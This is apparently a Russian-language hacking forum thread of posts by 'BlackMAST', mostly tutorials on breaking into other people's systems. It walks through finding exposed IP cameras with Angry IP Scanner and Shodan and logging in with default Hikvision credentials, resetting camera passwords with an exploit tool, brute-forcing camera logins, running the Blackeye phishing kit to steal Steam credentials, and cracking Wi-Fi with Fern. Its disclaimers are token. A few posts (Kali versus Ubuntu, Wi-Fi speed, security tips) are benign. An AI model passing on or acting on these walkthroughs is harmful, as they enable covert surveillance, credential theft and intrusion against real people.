Это самый простой метод для ленивых. На самом деле это не взлом, так как вам ничего взламывать не нужно, за вас уже все сделали другие. Просто используйте специальные сайты, на которых уже собраны тысячи взломанных камер по всему миру. Заходите и наблюдайте.
Эти веб-сайты созданы хакерами, которые проникают в камеры видеонаблюдения и предоставляют вам плоды своей работы бесплатно. Помимо этого, вы можете отсортировать камеры по производителям, странам, городам, часовым поясам и т.д. Ниже приведен пример камер видеонаблюдения, установленных в торговых центрах:
https://i.gyazo.com/91a69089cec927c47a6aa8f83624ef00.jpg
Нажмите здесь, чтобы перейти на сайт.
Способ № 2: Взлом IP-камеры
Что такое IP-камера
IP-камера - это цифровая видеокамера, представляющая из себя видеокамеру и компьютер, объединённые в 1 устройство. Захват и передача происходят в режиме реального времени через сеть, позволяя удалённо просматривать, хранить и управлять видеопотоком на базе IP.
Это способ нельзя назвать взломом, так как мы будем действовать иначе. Многие владельцы камер не сильно заморачиваются с установкой пароля для видеокамеры и просто используют заданный пароль по умолчанию. Суть данного метода заключается в том, чтобы заглянуть в руководство к IP-камере и найти стандартный пароль. Для этого вам просто нужно найти нужную камеру видеонаблюдения.
Как найти нужную камеру
Прежде чем вы попробуете ввести пароль, вам нужно найти камеру в Интернете. И в этом нам поможет программа Angry IP Scanner.
Давайте узнаём, как работает этот способ изнутри:
https://i.gyazo.com/58a9d374e58b5be0d56d94d9c32b71c4.jpg
Сетевой сканер (Angry IP Scanner) используется для получения информации от маршрутизатора, который находится в Интернете.
https://i.gyazo.com/ccbf49e7e557c64245baf47f0e45d111.jpg
Сам же маршрутизатор выступает в роли проводника, т.е. он не скрывает информацию, а наоборот предоставляет ее при соответствующем запросе. Мы можем сравнить этот процесс с обычным магазином, владелец которого демонстрирует покупателям товар, при этом держит в тайне, где он хранит ключи.
Angry IP Scanner
Шаг 1 - Загрузите Angry IP Scanner. Нажмите здесь, чтобы загрузить сканер Angry IP для вашей операционной системы: Windows, Mac или Линукс. Убедитесь, что у вас скачена и установлена последняя версия Java.
https://i.gyazo.com/59fbcc1c62fd178765e77893beb00e38.jpg
Шаг 2 - Установите Angry IP Scanner. Установка очень проста, вам просто нужно запустить установочный файл и следовать инструкциям, как показано на изображениях ниже:
https://i.gyazo.com/bf7a7c29c5f216c9cdc5655b7185a636.jpg
Шаг 3 - Настройте порты и сборщик Angry IP Scanner. Чтобы иметь возможность находить нужную нам информацию для взлома камер, необходимо выполнить настройку. Смотрите скриншот ниже:
https://i.gyazo.com/ab00dd033d0ebfee8e90ef4c397f49d0.jpg
Настройте порты 80, 23, 8080, 8081 и 8082, которые чаще всего используются пользователями, устанавливающими IP-камеры.
https://i.gyazo.com/58dccb901812c3342ec49003111a5375.jpg
Настройте сборщики, которые будут отображать некоторую информацию об устройстве, полезную для определения производителя. Перейдите к инструментам и щелкните Fetchers, чтобы открыть окно конфигурации.
https://i.gyazo.com/f59b9982bad529fdc6ac0b4e3a5bc42e.jpg
Выберите сборщик веб-обнаружения с правой стороны и щелкните на стрелку, направленную налево.
https://i.gyazo.com/510d4e42dd246dd9cd83061918c08bda.jpg
Шаг 4 - Выберите диапазон IP-портов для сканирования. Чтобы взломать камеру видеонаблюдения, сначала необходимо найти ту, которая доступна в Интернете, поэтому вам нужно выбрать диапазон IP-адресов для сканирования с помощью сканера Angry IP. Смотрите изображение ниже:
https://i.gyazo.com/a9dc526ebaff7b20ae21fa41f781d1bc.jpg
Вы можете использовать диапазон IP-адресов вашей страны или поставщика услуг, в приведенном выше скрине мы использовали диапазон от xx.242.10.0 до xx.242.10.255.
Обратите внимание, что вы можете заполнить первую часть диапазона IP-адресов и выбрать, например, /24 или /16, чтобы программное обеспечение нашло для вас диапазон с 254 или 65,534 хостами соответственно.
Сканирование может быть выполнено для тысячи IP-адресов, поэтому довольно часто можно найти множество IP-камер, цифровых и сетевых видеорегистраторов, подключенных к Интернету. После того, как вы найдете камеру в Интернете, вам просто нужно щелкнуть правой кнопкой мыши и выбрать, чтобы открыть ее в браузере. Так же, как показано ниже:
https://i.gyazo.com/be77a70a381bebd61b49d672e748aab3.jpg
В нашем случае выбор пал на устройство Hikvision. Логин и пароль в руководстве по умолчанию: «admin/12345».
https://i.gyazo.com/ca9c5582524dc2eb066365c7e5a07ee0.jpg
Ниже показан фрагмент записи с камеры видеонаблюдения после входа в систему с учетными данными admin/12345.
https://i.gyazo.com/9076b09c5d881f0f22f17320718f002a.jpg
Вы поняли суть этого способа?
Чтобы взломать камеру видеонаблюдения, вам просто нужно использовать инструмент для сканирования, найти онлайн-камеру и попробовать применить пароль по умолчанию, который вы можете получить из руководства производителя.
На сегодня все. Надеемся, что эта информация была полезной для вас.
В следующей части вы узнаете о других способах взлома камер видеонаблюдения, научитесь защищать свои устройства от хакеров, а также углубитесь в суть самого процесса изнутри.
BlackMAST
07.11.2022, 12:53
https://i.gyazo.com/6d0cc0b7cd39c7fe658d09d35e02528f.jpg
Вступить в наш чат
Операционная система является основой всех основ, отвечая за безупречную работу вашего компьютера. Нет плохих или хороших операционных систем, есть только конкретные цели, которые преследует пользователь при выборе ОС. Например, игроманам, несомненно, подойдёт Windows, поскольку на эту платформу выпускается наибольшее количество игр. Для проектирования и 3D моделирования как нельзя кстати пригодится Mac OS. Ну и, конечно же, когда речь заходит про программирование, взлом и тестирования на проникновение, то всем сразу на ум приходит Kali Linux. А что насчёт Ubuntu? В чем разница? Сегодня мы подробно сравним эти две ОС и определимся с целями использования.
Поехали!
https://i.gyazo.com/8b6adf896ad1ca5de10ee426b5e57962.jpg
Kali Linux
Kali Linux — это производный от Debian дистрибутив Linux, поддерживаемый Offensive Security. Его разработали Мати Ахарони и Девон Кернс. Kali Linux — это специально разработанная ОС для сетевых аналитиков или, проще говоря, для тех, кто работает в сфере кибербезопасности и анализа.
Многие думают, что Kali — только инструмент для взлома. Это один из самых больших мифов о Kali Linux. Kali Linux — это просто еще один дистрибутив Debian с набором сетевых инструментов и инструментов безопасности. Это настоящее оружие в умелых руках, которое не только пойдёт в атаку при необходимости, но и обеспечит вас защитой.
Ubuntu
Ubuntu — это операционная система на базе Linux, принадлежащая к семейству Linux Debian. Поскольку она основана на Linux, то находится в свободном доступе для использования и имеет открытый исходный код. Её разработала команда Canonical под руководством Марка Шаттлворта. Термин «ubuntu» происходит от африканского слова, означающего «человечность по отношению к другим».
Различия:
Kali Linux имеет более 600 предустановленных инструментов для тестирования на проникновение и сетевой безопасности, В Ubuntu же нет инструментов для взлома и тестирования на проникновение.
Ubuntu — хороший вариант для новичков в Linux. Kali Linux, в свою очередь, наиболее подходит уже для тех, кто разбирается в Linux и имеет опыт работы.
Если вы заинтересованы в тестировании на проникновение или кибербезопасности, то вам не обойтись без определенных инструментов для выполнения задач, которые уже предварительно установлены и настроены в Kali Linux. В Ubuntu же вам придётся дополнительно настраивать их.
Так как Ubuntu предназначена по-большей части для обычных пользователей, то ее интерфейс более прост и понятен в отличие от Kali Linux.
Ubuntu имеет более низкую скорость по сравнению с Kali Linux.
Что выбрать?
Kali Linux поставляется с более чем 600 предустановленными инструментами тестирования на проникновение, что делает его идеальной средой для для тестирования уязвимостей.
Но какой толк от всех этих приложений, если вы только начинаете свой путь в мире хакинга? Kali Linux, бесспорно, хорош, но только если вы знаете, как с ним работать. А если же 600 приложений, выполняющих почти одинаковые задачи приводят вас в ступор, то остановитесь и срочно скачайте Ubuntu.
Только после того как вы ознакомитесь с системой Linux, можно переходить к Kali. Эта ОС намного сложнее, чем вам кажется. Ubuntu более дружелюбен к начинающим пользователям Linux, а его последняя версия имеет привлекательный пользовательский интерфейс.
Заключение
Kali Linux должны использовать те, кто является профессиональными тестировщиками на проникновение, экспертами по кибербезопасности, хакерами или теми, кто знает, как с ней работать. Проще говоря, если вы знаете, как использовать Linux и его команды, систему и управление файлами, тогда вам подойдет Kali Linux. А если нет, то мы рекомендуем вам сначала начать с дистрибутива Ubuntu и освоить Linux, а после достаточной практики вы можете попробовать Kali Linux. Это не только сэкономит ваше время, но и облегчит использование.
На этом все. Удачи!
BlackMAST
10.11.2022, 12:46
https://i.gyazo.com/0a81c7f684747a968d2d8b6a37da34b4.jpg
Вступить в наш чат
А вы знали, что на самом деле взломать веб-камеру проще простого? Не верите? Тогда читайте эту статью до конца, и вы сами в этом убедитесь.
Если вы еще не читали первую часть этой темы, то переходите прямо сейчас.
Как взломать IP-камеру видеонаблюдения
А мы продолжаем.
Взлом камеры с помощью shodan
Этот метод отличается своей простотой и доступностью, так как вам не нужно устанавливать программное обеспечение для сканирования сети, этот процесс уже сделан за вас, а вам просто нужно будет выполнить вход, используя учётные данные, заданные по умолчанию.
https://i.gyazo.com/551e3d6e7954e0e5e1c62d9731fa9f4e.jpg
Shodan — это интернет-сервис, который показывает интернет-устройства по всему миру, включая IP-камеры видеонаблюдения, цифровые видеорегистраторы и сетевые видеорегистраторы. Нужно просто ввести марку камеры или название производителя, и Shodan покажет вам много полезного, в том числе количество устройств по всему миру, их местоположение и даже открытые порты.
Взгляните сами на скриншот ниже и убедитесь, сколько информации доступно.
https://i.gyazo.com/abe0370f4a30adc06801f14a1557ff2a.jpg
Регистрация на сайте абсолютно бесплатная. Создав аккаунт, вы можете фильтровать свой запрос по камерам, странам и даже городам.
Shodan также показывает подробную информацию об IP-устройстве. Чтобы просмотреть сведения о камере, просто нажмите на детали, и откроется новое окно, которое покажет всю информацию о камере видеонаблюдения.
https://i.gyazo.com/a1d74b04cb3fc1cfe4d468384f6a9b29.jpg
Тут же вам будут доступны данные о местонахождении устройства и владельце.
https://i.gyazo.com/9a52c56e0ab04b4b535829b356a6dee4.jpg
Как мы уже знаем, каждая камера видеонаблюдения имеет свой IP-адрес в Интернете. Shodan же с лёгкостью продемонстрирует вам эту информацию, как показано ниже.
https://i.gyazo.com/1d012d6778bbc8c457c0c76653990293.jpg
После того, как мы выяснили всю вышеописанную информацию, нам нужно просто открыть браузер, чтобы ввести IP-адрес и порт устройства, а еще попытаться использовать логин и пароль по умолчанию, как описано ранее в предыдущей статье.
Для нашей камеры мы использовали следующее: XX.226.219.250:88
https://i.gyazo.com/642355b81af2f76bbdc164864cce04c0.jpg
Если вам повезло и пароль камеры никогда не менялся, то вы сможете войти в систему, введя заводские данные.
Это был простой метод, который мы не можем назвать 100 % взломом, однако, он может быть очень полезен для практики ваших хакерских умений. В следующей статье мы расскажем вам о более продвинутом способе, который используется опытными хакерами, но тем не менее он не отличается особой сложностью. Вы сможете взломать любую камеру наблюдения даже с самым сложным паролем. До новых встреч. Удачи!
BlackMAST
14.11.2022, 12:41
https://i.gyazo.com/5cbb3538b1061929a8ac7e9df3787241.jpg
Вступить в наш чат
Вы хотите взломать камеру видеонаблюдения, но имя пользователя и пароль по умолчанию были изменены владельцем? Не переживайте, потому что у нас есть решение: вы можете использовать эксплойт. Когда у устройства возникают проблемы с безопасностью, хакеры могут создавать эксплойты для автоматизации процесса взлома. То же самое применимо и к камерам видеонаблюдения.
Если вы еще не ознакомились с предыдущими статьями, то советуем вам начать с них:
Как взломать IP-камеру видеонаблюдения
Как хакнуть камеру видеонаблюдения с помощью Shodan
Что такое эксплойт
Эксплойт - это специальная программа, использующая недостатки в системе безопасности устройства.
В этой статье мы расскажем вам о программном обеспечении, созданном для использования уязвимости в камерах видеонаблюдения. Для примера мы возьмём камеру Hikvision. Эксплойт камеры видеонаблюдения очень прост в использовании. Вам просто нужно запустить его на компьютере, чтобы взломать камеру видеонаблюдения, которая находится в Интернете или в вашей локальной сети.
В марте 2017 года в IP-камерах Hikvision была обнаружена уязвимость, которая предоставляла прямой доступ к информации об устройстве (модель, серийный номер, версия прошивки и т.д.). О проблеме сообщили в Hikvision 6 марта 2017 года, компания оперативно исследовала проблему и признала наличие сбоя. Пять дней спустя Hikvision выпустила обновление, но камеры, которые продолжили использовать старую прошивку, по-прежнему уязвимы и по сей день.
https://i.gyazo.com/be6ec756d6ff479fcf84c16622b991eb.jpg
Дисклеймер: Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несём ответственности за любые ваши действия.
Давайте подробнее поговорим об инструменте эксплойта Hikvision.
Перед началом вам нужно скачать утилиту Hikvision password reset. Как только вы это сделаете, откройте программу.
https://i.gyazo.com/c66a9a74cbeb58e295f394440607f196.jpg
Эксплойт может взломать камеру видеонаблюдения, получив внутренний список пользователей IP-камеры и установив новый пароль для одного из них по вашему выбору.
Чтобы использовать эксплойт, просто выполните следующие действия:
1. Введите IP-адрес и порт камеры;
2. Нажмите "получить список пользователей";
3. Выберите пользователя для смены пароля;
4. Введите новый пароль и подтвердите.
https://i.gyazo.com/4c502272ec7f772549c83a2e5f18dd30.jpg
После выполнения этих шагов вам просто нужно ввести IP-адрес и порт камеры в веб-браузере и войти в систему, используя только что созданные учетные данные. На этом все. Вы успешно взломали камеру. Надеемся, что данная статья была полезной.
В следующей статье мы расскажем вам о взломе камер видеонаблюдения с помощью атаки брутфорс и кода.
BlackMAST
16.11.2022, 13:04
https://i.gyazo.com/a04dd45ce0dda123103d32cc3ffb02c2.jpg
Вступить в наш чат
Брутфорс-атака - это один из самых основных методов взлома, использующийся хакерами. Представьте, что вы могли бы методом подбора выявить нужный пароль. Но сколько же это займёт времени, если вы будете делать это вручную? Страшно представить. А что, если за вас это сделает специальная программа, способная проверять сотни и даже тысячи паролей в минуту? Шансы на успех вырастают, не так ли? Итак, в этой статье мы расскажем вам как работает этот метод взлома, и как он применим к камерам видеонаблюдения.
Brute-force атака — метод взлома, при котором хакер подбирает логин или пароль к учетной записи с помощью перебора всех возможных вариантов.
Данный метод уже очень давно является автоматизированным, так как существует огромное количество программ со встроенными словарями, данные которых регулярно обновляются. Одним из таких является *****, доступный в Kali Linux.
https://i.gyazo.com/a5b3c74798278bb14af3e4e711f05773.jpg
***** — это мощный инструмент для взлома паролей методом брутфорс. Сегодня мы покажем, как с помощью ***** взломать веб-камеру.
Дисклеймер: Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
***** - это встроенный инструмент в Kali Linux, но если он у вас отсутствует, то скачайте его бесплатно. Вы можете использовать ***** для Linux или Windows.
Для начала вам просто нужно подготовить файл с паролями которые вы будете использовать, для этого введите команду:
***** -s 88 -l admin -P/root/desktop/pass.txt -e ns
Расшифровка:
-s 88 — номер порта на IP-камере;
-l admin — имя пользователя по умолчанию, которое будет использоваться;
(admin) -P/root/desktop/pass.txt — ваш файл со списком паролей;
-e-пустой пароль;
ns — логин и пустой пароль.
https://i.gyazo.com/92097306726736db2871bda030cd1154.jpg
После этого программа запускается и начинает подбирать разные слова, полученные из txt-файла, и продолжает делать это до тех пор, пока не будет найдено совпадение.
Это всего лишь вопрос времени, когда инструмент найдет правильный пароль.
Однако, современные камеры видеонаблюдения не допускают такой тип атаки, так как при обнаружении слишком большого количества попыток в систему, они блокируют доступ на некоторое время.
Заключение
Существуют разные способы взлома камеры видеонаблюдения, и все они требуют от хакера хотя бы некоторых базовых навыков: понимание, как устроены веб-камеры, какие способы взлома существуют, умение работать с Kali Linux и многое другое. Надеемся, что наша серия статей про взлом камер видеонаблюдений пролила свет на эти вопросы. Желаем вам удачи!
Другие статьи по теме:
Как взломать IP-камеру видеонаблюдения
Как хакнуть камеру видеонаблюдения с помощью Shodan
Взлом камеры видеонаблюдения с помощью эксплойта.
BlackMAST
21.11.2022, 12:42
https://i.gyazo.com/faed166ed3cbbf53af36ee0f3bb8cbe3.jpg
Вступить в наш чат
Хотите ли вы хакнуть профиль пользователя на любом сайте? Если да, то эта статья для вас. Мы расскажем о самом простом способе, который осилит даже новичок. Все, что нам понадобится это элементарные знания о фишинге и социальной инженерии. А теперь обо всем по-порядку.
Прежде чем перейти к практической части, давайте освежим ваши знания о фишинге и о том, как он работает. Ну а если вы уже профи в этом деле, то переходите сразу к разделу «Установка Blackeye».
https://i.gyazo.com/d7245b9fc449ca54575bcaf2b82af078.jpg
Фишинг. Почему такое название
Фишинг — это метод взлома, при котором злоумышленник создаёт поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. Фишинг — один из старейших, но наиболее эффективных методов взлома. Если раньше хакеру требовалось вручную создавать фишинговую страницу, то теперь за вас это делает специальная программа, что делает процесс взлома ещё более доступным даже для новичка.
Слово "фишинг" в переводе на английский означает "рыбачить". Такое название появилось не с проста, так как вы подобной рыбаку делаете приманку, а затем бросаете ее в воду, в ожидании того, что рыба клюнет.
Готовы поймать рыбку?
Делаем приманку
Blackeye — это инструмент, который может сделать фишинг максимально простым. Фишинг и взлом аккаунтов являются противозаконными деяниями, поэтому дисклеймер.
Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Blackeye — это автоматизированный скрипт с готовыми фишинговыми страницами практически для всех популярных веб-сайтов, которые только можно придумать. У вас также есть возможность создавать собственные фишинговые страницы.
Для этой статьи мы сделаем поддельную страницу для взлома аккаунтов Steam. Мы покажем вам, как легко хакеры могут взламывать и компрометировать сайты.
Установка BlackEye
Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы загрузить и клонировать фишинговый инструмент blackeye на вашу машину kali:
git clone https://github.com/thelinuxchoice/blackeye
Шаг 2: Теперь, чтобы запустить blackeye, перейдите в папку blackeye с помощью команды:
cd blackeye
Чтобы запустить blackeye, запустите файл с именем blackeye.sh, набрав в терминале следующее:
bash blackeye.sh
Команда откроет терминал со всеми доступными шаблонами для фишинговых страниц, а также опцией для пользовательского шаблона фишинга, как показано на изображении ниже.
https://i.gyazo.com/a0a374ea692b3f027bc8a28c40965593.jpg
Как использовать инструмент blackeye
Ниже мы продемонстрируем, как взломать аккаунт Steam с помощью Blackeye. Пока мы используем шаблон steam, вы можете аналогичным образом использовать любые другие шаблоны из списка.
Итак, давайте начнем.
Шаг 1: Выберите нужный шаблон, введя номер на терминале.
Шаг 2: Инструменту Blackeye нужен ваш IP-адрес.
Введите IP-адрес, как показано ниже:
https://i.gyazo.com/6581b6a406b71762681db4ec49b60471.jpg
Шаг 3: Теперь поделитесь ссылкой с жертвой, используя социальную инженерию, чтобы поймать рыбку на крючок.
Скоро мы опубликуем подробное руководство по социальной инженерии, так что следите за обновлениями.
Теперь вам просто нужно дождаться, пока жертва войдет в систему по ссылке.
Шаг 3: Когда жертва нажимает на ссылку и вводит пароль и учетные данные, учетные данные перехватываются и передаются на наш компьютер с Kali Linux, как показано ниже. Также жертва перенаправляется на исходную страницу в Steam, думая, что неверно ввела логин-пароль.
Терминал kali отобразит учетные данные и всю информацию, как показано ниже:
https://i.gyazo.com/b516fe96c1e89c8e9025bbe387c5eda0.jpg
Вот так просто вы можете взломать любой веб-сайт с помощью инструмента Blackeye Phishing Tool в Kali Linux.
На это все. Удачи!
BlackMAST
24.11.2022, 12:58
https://i.gyazo.com/3db039743a5a2a3e085cd2d0f0908c59.jpg
Вступить в наш чат
Замечали ли вы, как падает скорость вашего Wi-Fi? Вы можете оформить подписку на самый быстрый интернет-тариф, но ваша скорость по-прежнему будет оставлять желать лучшего. В чем же дело? Существует ряд немаловажных действий, которые необходимо выполнить, чтобы ваш интернет работал на высоких скоростях. В этой статье вы узнаете, как разогнать ваш Wi-Fi до максимума. Поехали!
Для начала давайте убедимся, что скорость вашего соединения, действительно, низкая. Для этого откройте сервис для проверки скорости интернета, например, speedtest.net.
https://i.gyazo.com/7ae65fee15643a5b7e853004c0e49ad6.png
Если ваши опасения подтвердились, то значит пора действовать!
Найдите идеального место для роутера
Хотите верьте, хотите нет, но расположение роутера в вашем доме напрямую влияет на скорость. Если роутер расположен рядом со стенами, шкафами или книжными полками, это может привести к нарушению беспроводного сигнала. Убедитесь, что он не находится в углу, под шкафом или в выдвижном ящике. Идеальное место - вдали от стены и от других устройств, использующих электромагнитные волны.
https://i.gyazo.com/9de684425fc7b84213d76073854c7b2c.jpg
Используйте Ethernet-кабель
Проводное соединение предпочтительнее беспроводного, поскольку оно обеспечивает более быстрое, стабильное и безопасное соединение и не зависит от других устройств. Для аппаратных устройств, которым нужен самый быстрый интернет — игровых консолей, ПК, стриминговых боксов и т. д. — кабель Ethernet — лучший вариант. Ваш роутер имеет множество портов Ethernet, поэтому вам не нужно беспокоиться о том, что их не хватит для нескольких устройств. Единственным ограничением является то, что кабели Ethernet ограничивают движение ваших устройств, поэтому советуем подключить только то устройство, которое требует самой высокой скорости.
https://i.gyazo.com/242823a3c902377241432dcbe46c83d9.jpg
Обновите свой роутер
Роутеры значительно различаются между собой по функциям, которые они могут выполнять. Если в доме есть мертвые зоны, то измените дальность вещания вашего Wi-Fi. Большой метраж дома подразумевает наличие удлинителей Wi-Fi, чтобы сигнал доходил даже до самых дальних уголков вашего дома. Вам также необходимо следить за тем, чтобы ваш роутер был правильно настроен, а программное обеспечение обновлялось ежедневно. Только тогда можно быть уверенным, что роутер справиться с возможными ошибками в программе, а скорость Интернета не упадёт.
https://i.gyazo.com/37568e19da15d3c8107cf6a69e69f61a.png
Установите надёжный пароль для Wi-Fi
Это может показаться слишком очевидным, но все же многие пренебрегают этим пунктом, устанавливая слишком простые пароли, которые легко поддаются брутфорс-атакам и иным хакерским взломам. Надёжный пароль поможет защититься от злоумышленников и сохранить скорость.
Подробнее о том, как легко взломать Wi-Fi читайте в нашей статье тут.
Отключите неиспользуемые устройства
Чем больше устройств, подключенных к вашему Wi-Fi-соединению, тем медленнее скорость. Обратите внимание, все ли устройства, подключённые к Wi-Fi вами используются. В противном случае отключите ненужные, так Интернет-скорость будет распределяться равномерно.
Заключение
Все пункты, упомянутые выше, обеспечат безопасное и быстрое подключение к Интернету на всех ваших устройствах. Если ни один из этих способов не сработал, что крайне маловероятно, то вам следует обратиться к своему интернет-провайдеру для дальнейших действий. На этом все. Удачи!
BlackMAST
28.11.2022, 12:46
https://i.gyazo.com/35d7add40682def217145e9b5d9b9fc1.jpg
Вступить в наш чат
Кибербезопасность — это процесс предотвращения хакерских атак на системы, подключенные к Интернету, такие как компьютеры, сайты, мобильные устройства и данные. Методы предотвращения кибератак постоянно развиваются, как и сами угрозы. Вы должны знать о всех последних новшествах, чтобы уметь защищать свое личное пространство от угроз из вне.
https://i.gyazo.com/ab1ad0d5ec6e13a8c2e94e54c62f53a1.jpg
● Используйте брандмауэр и антивирусное программное обеспечение
Самый распространенный способ остановить злонамеренные атаки — использовать антивирус. Антивирусное программное обеспечение предотвращает проникновение троянов и других киберопасностей в вашу систему. Используйте антивирусное программное обеспечение от проверенных поставщиков и оставьте в своей системе только один антивирусный пакет, так ваши данные останутся под защитой.
Использование брандмауэра имеет решающее значение для защиты ваших данных от вредоносных угроз. Брандмауэр помогает остановить хакеров, вирусы и другие нежелательные действия в Интернете, регулируя трафик, которому разрешен доступ к вашему устройству.
● Создавайте надежные пароли
Скорее всего, вы и так уже знаете, что создание надежных паролей имеет решающее значение для безопасности в Интернете. Использование паролей жизненно важно для предотвращения доступа хакеров к вашим данным!
Откажитесь от простых слов и словосочетаний, не используйте типичные фразы (клички животных, дни рождения и т.д.) Вместо этого выберите что-то более сложное, состоящее минимум из восьми и максимум из 64 символов.
Минимум четыре символа, одна цифра, одна заглавная буква, одна строчная буква и символы &%#@ не допускаются в пароле.
Каждый раз используйте другой пароль.
Если вы забыли свой пароль, сбросьте его. Но так же меняйте его раз в год, а лучше каждые 2 месяца.
Не размещайте подсказки паролей везде, где их могут увидеть хакеры. Лучше держите пароль в голове.
● Используйте многофакторную или двухфакторную аутентификацию
Двухфакторная или многофакторная аутентификация — это услуга, которая повышает безопасность обычного метода онлайн-аутентификации - пароля. При использовании двухфакторной аутентификации вам потребуется ввести вторую форму идентификации, такую как код, полученный на мобильное устройство, отдельный пароль или даже отпечаток пальца. При многофакторной аутентификации вы должны выполнить более двух различных процедур аутентификации после предоставления своего логина и пароля.
Не рекомендуется устанавливать только SMS для двухфакторной аутентификации, поскольку вредоносное ПО может использоваться для атак на мобильные телефонные сети и компрометации данных.
● Регулярно обновляйте программное обеспечение
Атаки программ-вымогателей представляют серьезную угрозу как для обычных пользователей, так и для компаний. Одной из наиболее важных рекомендаций по кибербезопасности является исправление устаревшего программного обеспечения, включая операционные системы и приложения. Это помогает устранить важные бреши в системе безопасности, которые злоумышленники используют для получения доступа к вашим устройствам. Вот несколько простых советов, которые помогут вам:
Активируйте автоматические обновления системы вашего устройства.
Убедитесь, что ваш браузер автоматически устанавливает обновления безопасности.
Обновите плагины в своих браузерах, такие как Flash и Java.
● Обеспечьте безопасность вашей личной информации, позволяющей установить личность (PII)
Личная идентифицируемая информация (PII) — это любые данные, которые киберпреступник может использовать для обнаружения или идентификации конкретного человека. Имя, адрес, номер телефона, дата рождения, номер социального страхования, адрес, информация о местоположении и любые другие данные о цифровой или физической личности являются PII.
● Безопасность блокчейна
Одной из новейших технологий кибербезопасности, которая набирает популярность, является безопасность блокчейна. В основе работы технологии блокчейн лежит идентификация между участниками транзакции. Как и технология блокчейна, одноранговые сети являются основой кибербезопасности блокчейна.
Каждый участник блокчейна отвечает за подтверждение точности добавляемых данных. Блокчейны также являются нашим лучшим вариантом для защиты данных от компрометации, поскольку они создают практически неуязвимую сеть хакеров. Таким образом, объединение блокчейна и ИИ может обеспечить надежный метод проверки для предотвращения любых киберрисков.
● Утечка информации через приложения
Безопасность данных — огромная проблема, и любая организация, независимо от ее размера или сферы деятельности, может серьезно пострадать. Большинство утечек данных происходит через приложения, которые являются основными векторами. Что случиться, если ваши данные будут скомпрометированы? Утечка конфиденциальной информации происходит, когда данные непреднамеренно становятся доступными в Интернете. Это означает, что киберпреступник может быстро получить несанкционированный доступ к конфиденциальным данным.
Иногда обнаруживаются ошибки приложений. Большинство проблем вызвано недостатками и ошибками в дизайне программы, исходном коде или компонентах программы. Ошибки могут привести к сбою программного обеспечения, зависанию машины или иметь более тонкие последствия. Поэтому особое внимание стоит уделить приложениям и тем данным, которые вы разрешаете обрабатывать тому или иному приложению. Намного лучше свести к минимуму или вообще исключить какой-либо доступ для приложений, запрашивающих разрешение.
● Шифрование данных и предотвращение потери данных (DLP)
Потеря данных происходит, когда ценная или конфиденциальная информация на компьютере скомпрометирована из-за кражи, повреждения программы, хакеров, вирусов, человеческой ошибки или перебоев в подаче электроэнергии. Кроме того, причиной могут быть повреждения, механическая неисправность или иные дефекты. Часто бывает, что данные повреждены или случайно удалены, что приводит к «потере» данных. Например, падение жесткого диска ноутбука может быстро привести к утечке или повреждению данных из-за вирусов или вредоносного программного обеспечения.
Необходимо шифровать данные, чтобы это предотвратить. Шифрование данных — это метод обеспечения безопасности, при котором информация шифруется таким образом, что только пользователь и правильный ключ шифрования могут получить к ней доступ или расшифровать ее. Для шифрования данных доступно множество технологий, и AES, RSA и DES — лишь некоторые из них.
Заключение
Технологии регулярно и безостановочно развиваются, что в конечном итоге приводит к кибератакам. По мере того, как утечки данных, программы-вымогатели и взломы становятся все более частыми, происходит и усовершенствования в тенденциях киберзащиты. Здесь имеет смысл постоянно выявлять для себя и применять передовые технологии кибербезопасности для повышения безопасности и анонимности в Интернете.
BlackMAST
01.12.2022, 19:28
https://i.gyazo.com/3f9109bc0ff46ebf0a8ebed8a9b88c3d.jpg
Вступить в наш чат
Fern Wifi Cracker — это инструмент для аудита безопасности беспроводной сети, написанный с использованием языка программирования Python. Эта программа способна взламывать и восстанавливать ключи WEP/WPA/WPS, а также запускать другие сетевые атаки на беспроводные или Ethernet-сети. Это один из лучших взломщиков Wi-Fi с графическим интерфейсом для Linux из доступных на сегодняшний день.
Итак, сейчас вы узнаете, как хакнуть Wi-Fi с помощью взломщика Wi-Fi Fern в Kali Linux.
https://i.gyazo.com/25eab8aa8535578c495b516ef17777ad.jpg
Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.
Fern предустановлен в Kali Linux. Он также автоматически обновляется вместе с Kali. Чтобы открыть взломщик Wi-Fi Fern, перейдите в «Приложения», затем в «Беспроводная атака», а затем нажмите взломщик Wi-Fi Fern, как показано на изображении ниже:
https://i.gyazo.com/5d0cb375a3c0869fd5f61656bfee6ff3.jpg
Шаг 1: Выберите интерфейс. Выпадающее меню покажет вам доступные.
Шаг 2: Поиск точек доступа. Нажмите «Поиск точек доступа». Вам нужно подождать, пока не появится статус «Активно». Теперь программа начнет сканирование сетей Wi-Fi.
Шаг 3: Доступные сети Wi-Fi. Все сети Wi-Fi поблизости будут автоматически отсортированы.
Шаг 4: Взлом. Сейчас мы попробуем взломать Wi-Fi-сети, основанные на безопасности WPA/WPA2. Как вы можете увидеть на скриншоте ниже, были обнаружены следующие сети:
https://i.gyazo.com/623d579b2957676b695ac445081dcab5.jpg
В зависимости от типа безопасности сети мы можем попробовать различные атаки.
Выберите сеть Wi-Fi, которую вы хотите взломать, и выполните пентест с помощью взломщика Wi-Fi Fern.
Шаг 5: Нажмите кнопку «Browse» внизу страницы.
https://i.gyazo.com/e52e5f47f91fe2b5e87d0a570361ca1d.jpg
Шаг 6: Нажмите на кнопку «Атака» и дождитесь начала.
Если вы читали наши предыдущие статьи о брутфорсе, то знаете, что это процесс проб и ошибок. В зависимости от сложности пароля и мощности ПК, время необходимое для взлома, будет варьироваться.
После успешной атаки вы сможете увидеть пароли в «Базе ключей» в любое время.
https://i.gyazo.com/11ae477def60e70a52ca826c2369c536.jpg
Поздравляем, вы узнали, как взломать любой пароль с помощью взломщика Wi-Fi Fern, выполнив эти простые шаги. Благодаря этому инструменту вы, вероятно, сможете взломать практически любую сеть Wi-Fi. На этом все. Удачи!
BlackMAST
05.12.2022, 12:52
https://i.gyazo.com/9bbd14f263caaf4a019632cace71ea6d.jpg
Вступить в наш чат
